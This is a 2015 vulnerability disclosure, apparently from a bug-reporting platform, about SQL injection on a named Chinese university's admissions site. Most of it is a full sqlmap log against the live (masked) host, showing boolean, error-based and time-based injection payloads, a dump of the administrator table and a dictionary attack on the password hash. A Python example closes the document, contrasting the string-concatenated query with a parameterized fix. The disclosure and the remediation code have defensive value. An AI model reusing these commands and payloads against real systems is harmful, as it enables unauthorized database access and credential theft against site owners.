2015-10-30: Details have been reported to the vendor and are awaiting vendor handling.
2015-11-04: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Wuhan Institute of Technology admissions information site has a SQL injection vulnerability that yields the top-level administrator account
The Wuhan Institute of Technology admissions information site (http://**.**.**.**:8081/) has a SQL injection vulnerability; through this injection the top-level administrator account can be obtained.
SQL injection point: http://**.**.**.**:8081/about.jsp?about_id=21
$python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21"
[16:52:42] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[16:52:42] [INFO] testing connection to the target url
[16:52:42] [INFO] testing if the url is stable, wait a few seconds
[16:52:43] [INFO] url is stable
[16:52:43] [INFO] testing if GET parameter 'about_id' is dynamic
[16:52:43] [INFO] confirming that GET parameter 'about_id' is dynamic
[16:52:43] [INFO] GET parameter 'about_id' is dynamic
[16:52:43] [INFO] heuristic test shows that GET parameter 'about_id' might be injectable (possible DBMS: MySQL)
[16:52:43] [INFO] testing sql injection on GET parameter 'about_id'
[16:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:52:43] [INFO] GET parameter 'about_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:52:46] [INFO] GET parameter 'about_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:52:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:52:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:53:10] [INFO] GET parameter 'about_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:53:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:53:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'about_id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: about_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: about_id=21 AND 4339=4339

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: about_id=21 AND SLEEP(5)
---
[17:01:09] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:01:09] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 25 times
[17:01:09] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'
[*] shutting down at: 17:01:09

python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21" -D zhaosheng -T admin -C charge,id,password,username --dump
[*] starting at: 17:02:16
[17:02:16] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[17:02:16] [INFO] resuming injection data from session file
[17:02:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:02:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: about_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: about_id=21 AND 4339=4339

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: about_id=21 AND SLEEP(5)
---
[17:02:16] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:02:16] [INFO] fetching columns 'charge, id, password, username' entries for table 'admin' on database 'zhaosheng'
[17:02:16] [INFO] the SQL query used returns 1 entries
[17:02:16] [INFO] retrieved: 3
[17:02:16] [INFO] retrieved: 4
[17:02:16] [INFO] retrieved: ********************************
[17:02:16] [INFO] retrieved: admin
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y
[17:02:19] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [D:\Documents\Desktop\sqlmap\txt\wordlist.txt]
[17:02:20] [INFO] loading dictionary from: 'D:\Documents\Desktop\sqlmap\txt\wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[17:02:23] [INFO] starting dictionary attack (md5_generic_passwd)
[17:02:23] [WARNING] no clear password(s) found
Database: zhaosheng
Table: admin
[1 entry]
+--------+----+----------------------------------+----------+
| charge | id | password                         | username |
+--------+----+----------------------------------+----------+
| 3      | 4  | ******************************** | admin    |
+--------+----+----------------------------------+----------+
[17:02:23] [INFO] Table 'zhaosheng.admin' dumped to CSV file 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\dump\zhaosheng\admin.csv'
[17:02:23] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 5 times
[17:02:23] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'
Apply SQL filtering to the navigation links and the article links.
Severity: No impact (vendor ignored)
Ignored at: 2015-11-04 11:04
None yet
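The root cause sqlmap reports above is that the numeric about_id parameter is concatenated into the query, so the boolean probe `21 AND 4339=4339` changes what the query returns. The following is an added example, not code from the site or from the report author; it uses an in-memory SQLite table with assumed table and column names (`about`, `about_id`, `title`) to contrast that defect with the fix a practitioner would apply: validate the parameter as an integer and bind it as data rather than relying on filtering. In the JSP/MySQL stack the report identifies, the same fix is a JDBC `PreparedStatement` with `setInt`.

```python
import re
import sqlite3

# Constructed sample table standing in for the site's "about" pages.
# Table and column names are assumptions for illustration only.
def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE about (about_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO about VALUES (?, ?)",
        [(20, "Campus overview"), (21, "Admissions policy"), (22, "Contact")],
    )
    conn.commit()
    return conn


def get_about_vulnerable(conn, about_id):
    """The defect pattern: the raw query-string value is spliced into SQL.

    A value such as "21 AND 4339=4339" becomes part of the WHERE clause,
    which is exactly the boolean-based blind probe sqlmap used above.
    """
    sql = "SELECT about_id, title FROM about WHERE about_id = " + about_id
    return conn.execute(sql).fetchall()


def validate_about_id(value):
    """Allow-list check: the parameter must be a plain decimal integer.

    Returns the integer, or None when the value is not acceptable.
    """
    if not isinstance(value, str) or re.fullmatch(r"[0-9]{1,9}", value) is None:
        return None
    return int(value, 10)


def get_about_fixed(conn, about_id):
    """Hardened version: validate, then bind the value as a parameter.

    Even if the integer check were removed, the '?' placeholder sends the
    value as data, so SQL keywords inside it never alter the query.
    """
    about_id_int = validate_about_id(about_id)
    if about_id_int is None:
        raise ValueError("about_id must be a decimal integer")
    sql = "SELECT about_id, title FROM about WHERE about_id = ?"
    return conn.execute(sql, (about_id_int,)).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    # The two probes differ only in a constant comparison, yet the
    # vulnerable query returns a row for one and nothing for the other:
    # that difference is the oracle a blind injection relies on.
    print(get_about_vulnerable(db, "21 AND 4339=4339"))
    print(get_about_vulnerable(db, "21 AND 4339=4340"))
    # The fixed handler rejects the same input before it reaches SQL.
    try:
        get_about_fixed(db, "21 AND 4339=4339")
    except ValueError as exc:
        print("rejected:", exc)
    print(get_about_fixed(db, "21"))
```

The vulnerable and hardened handlers take the same string the web layer would hand them; the difference is only where the value enters the query. Returning a 400-style error from `get_about_fixed` on invalid input, rather than a 500, would also remove the server-error signal that sqlmap counted 25 times during its test run.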